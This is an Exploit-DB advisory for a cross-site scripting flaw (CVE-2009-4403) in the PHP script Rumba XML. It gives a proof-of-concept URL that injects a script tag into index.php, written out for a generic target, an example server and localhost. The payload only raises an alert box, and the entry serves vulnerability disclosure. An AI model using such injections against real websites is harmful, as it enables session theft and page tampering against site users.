Rumba XML suffers from a Cross-Site scripting Vulnerability

2009-12-17T00:00:00
ID EDB-ID:10534
Type exploitdb
Reporter Hadi Kiamarsi
Modified 2009-12-17T00:00:00

Description

Rumba XML suffers from a cross site scripting vulnerability. CVE-2009-4403. Webapps exploit for php platform

                                        
                                            ###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip
#

###########################################

PoC :

http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>

example :

http://server/index.php/>"><script>alert('Hadi Kiamarsi')</script>

local Example :

http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>